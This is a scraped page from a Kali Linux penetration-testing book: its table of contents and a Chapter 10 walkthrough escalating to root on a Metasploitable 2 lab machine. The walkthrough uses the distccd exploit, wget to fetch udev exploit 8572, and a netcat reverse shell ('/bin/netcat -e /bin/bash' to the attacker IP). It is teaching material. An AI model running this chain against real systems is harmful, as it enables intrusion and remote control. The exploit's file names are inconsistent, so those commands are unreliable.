Table of Contents for
Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition

Version ebook / Retour

Cover image for bash Cookbook, 2nd Edition Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition by Gerard Johansen Published by Packt Publishing, 2016
  1. Cover
  2. Table of Contents
  3. Kali Linux 2 – Assuring Security by Penetration Testing Third Edition
  4. Kali Linux 2 – Assuring Security by Penetration Testing Third Edition
  5. Credits
  6. Disclaimer
  7. About the Authors
  8. About the Reviewer
  9. www.PacktPub.com
  10. Preface
  11. What you need for this book
  12. Who this book is for
  13. Conventions
  14. Reader feedback
  15. Customer support
  16. 1. Beginning with Kali Linux
  17. Kali Linux tool categories
  18. Downloading Kali Linux
  19. Using Kali Linux
  20. Configuring the virtual machine
  21. Updating Kali Linux
  22. Network services in Kali Linux
  23. Installing a vulnerable server
  24. Installing additional weapons
  25. Summary
  26. 2. Penetration Testing Methodology
  27. Vulnerability assessment versus penetration testing
  28. Security testing methodologies
  29. General penetration testing framework
  30. Information gathering
  31. The ethics
  32. Summary
  33. 3. Target Scoping
  34. Preparing the test plan
  35. Profiling test boundaries
  36. Defining business objectives
  37. Project management and scheduling
  38. Summary
  39. 4. Information Gathering
  40. Using public resources
  41. Querying the domain registration information
  42. Analyzing the DNS records
  43. Getting network routing information
  44. Utilizing the search engine
  45. Metagoofil
  46. Accessing leaked information
  47. Summary
  48. 5. Target Discovery
  49. Identifying the target machine
  50. OS fingerprinting
  51. Summary
  52. 6. Enumerating Target
  53. Understanding the TCP/IP protocol
  54. Understanding the TCP and UDP message format
  55. The network scanner
  56. Unicornscan
  57. Zenmap
  58. Amap
  59. SMB enumeration
  60. SNMP enumeration
  61. VPN enumeration
  62. Summary
  63. 7. Vulnerability Mapping
  64. Vulnerability taxonomy
  65. Automated vulnerability scanning
  66. Network vulnerability scanning
  67. Web application analysis
  68. Fuzz analysis
  69. Database assessment tools
  70. Summary
  71. 8. Social Engineering
  72. Attack process
  73. Attack methods
  74. Social Engineering Toolkit
  75. Summary
  76. 9. Target Exploitation
  77. Vulnerability and exploit repositories
  78. Advanced exploitation toolkit
  79. MSFConsole
  80. MSFCLI
  81. Ninja 101 drills
  82. Writing exploit modules
  83. Summary
  84. 10. Privilege Escalation
  85. Password attack tools
  86. Network spoofing tools
  87. Network sniffers
  88. Summary
  89. 11. Maintaining Access
  90. Working with tunneling tools
  91. Creating web backdoors
  92. Summary
  93. 12. Wireless Penetration Testing
  94. Wireless network recon
  95. Wireless testing tools
  96. Post cracking
  97. Sniffing wireless traffic
  98. Summary
  99. 13. Kali Nethunter
  100. Installing Kali Nethunter
  101. Nethunter icons
  102. Nethunter tools
  103. Third-party applications
  104. Wireless attacks
  105. HID attacks
  106. Summary
  107. 14. Documentation and Reporting
  108. Types of reports
  109. The executive report
  110. The management report
  111. The technical report
  112. Network penetration testing report (sample contents)
  113. Preparing your presentation
  114. Post-testing procedures
  115. Summary
  116. A. Supplementary Tools
  117. Web application tools
  118. Network tool
  119. Summary
  120. B. Key Resources
  121. Paid incentive programs
  122. Reverse engineering resources
  123. Penetration testing learning resources
  124. Exploit development learning resources
  125. Penetration testing on a vulnerable environment
  126. Online web application challenges
  127. Virtual machines and ISO images
  128. Network ports
  129. Index

Chapter 10. Privilege Escalation

In the previous chapter, we exploited a target machine using the vulnerabilities found during the vulnerabilities mapping process. The goal of performing the exploitation is to get the highest privilege accounts available, such as administrator-level accounts in the Windows system or root-level accounts in the Unix system.

After you exploit a system, the next step you would want to take is to do a privilege escalation. Privilege escalation can be defined as the process of exploiting a vulnerability to gain elevated access to the system.

There are two types of privilege escalation, as follows:

  • Vertical privilege escalation: In this type, a user with lower privilege is able to access the application functions designed for the user with the highest privilege, for example, a content management system where a user is able to access the system administrator functions.
  • Horizontal privilege escalation: This happens when a normal user is able to access functions designed for other normal users. For example, in an Internet banking application, user A is able to access the menu of user B.

The following are the privilege escalation vectors that can be used to gain unauthorized access to the target:

  • Local exploits
  • Exploiting a misconfiguration such as a home directory that is accessible, and which contains an SSH private key allowing access to other machines
  • Exploiting weak passwords on the target
  • Sniffing the network traffic to capture the credentials
  • Spoofing the network packets

In this chapter, we will not discuss how to exploit the misconfiguration.

Privilege escalation using a local exploit

In this section, we are going to use a local exploit to escalate our privilege.

To demonstrate this, we will use the following virtual machines:

  • Metasploitable 2 as our victim machine with an IP address of 172.16.43.156
  • Kali Linux as our attacking machine with an IP address of 172.16.43.150

First, we identify the open network services available on the victim machine. For this, we utilize the Nmap port scanner with the following command:

nmap –p- 172.16.43.156

We configure Nmap to scan for all the ports (from port 1 to port 65,535) using the -p- option.

The following screenshot shows the brief result of the preceding command:

Privilege escalation using a local exploit

After researching on the Internet, we found that the distccd service has a vulnerability that may allow a malicious user to execute arbitrary commands. The distccd service is used to scale large compiler jobs across a farm of similarly configured systems.

Next, we search in Metasploit to find whether it has the exploit for this vulnerable service:

Privilege escalation using a local exploit

From the preceding screenshot, we can see that Metasploit has the exploit for the vulnerable distccd service.

Let's try to exploit the service as shown in the following screenshot:

Privilege escalation using a local exploit

We are able to exploit the service and issue an operating system command to find our privilege: daemon.

The next step is to explore the system to get more information about it. Now, let's see the kernel version used by issuing the following command:

uname –r

Note

The kernel version used is 2.6.24-16-server.

We searched the exploit-db database and found an exploit (http://www.exploit-db.com/exploits/8572/) that will allow us to escalate our privilege to root. We then conduct a search of the Kali Linux exploit using the term udev, which matches the exploit in the exploit-db webpage using the following command:

searchsploit udev

This command produces the following output:

Privilege escalation using a local exploit

Next, we need to get this exploit from our attacking machine to the compromised machine. We can do this using the compromised machine's wget command. First, we transfer the exploit to the folder on our machine where the compromised machine will look for the file. Use the command line to copy the exploit by typing the following:

cp /usr/share/exploitdb/platforms/linux/local/857s.c /var/www/html

Next, make sure the Apache 2 server is running by typing this:

service apache2 start

We can download the exploit from our attacking machine by using the wget command on the compromised machine, which looks for the file in the attacking machine's /var/www/html folder:

Privilege escalation using a local exploit

After successfully downloading the exploit, we compile it on the victim machine using the following gcc command:

gcc 8572.c –o 8572

Now our exploit is ready to be used. From the source code, we found that this exploit needs the Process Identifier (PID) of the udevd netlink socket as the argument. We can get this value by issuing the following command:

cat /proc/net/netlink

The following screenshot shows the result of this command:

Privilege escalation using a local exploit

You can also get the udev service PID, 1, by giving the following command:

ps aux | grep udev

The following command line screenshot is the result of the preceding command:

Privilege escalation using a local exploit

Note

In a real penetration testing engagement, you may want to set up a test machine that has the same kernel version as the target to test the exploit.

From our information gathering on the victim machine, we know that this machine has Netcat installed. We will use Netcat to connect back to our machine once the exploit runs in order to give us root access to the victim machine. Based on the exploit source code information, we need to save our payload in a file called run:

echo '#!/bin/bash' > run  echo '/bin/netcat -e /bin/bash 172.16.43.150 31337' >> run

We also need to start the Netcat listener on our attacking machine by issuing the following command:

nc -vv -l -p 31337

The one thing left to do is to run the exploit with the required argument:

./8512.c 2675

In our attacking machine, we can see the following messages:

Privilege escalation using a local exploit

After issuing the whoami command, we can see that we have successfully escalated our privilege to root.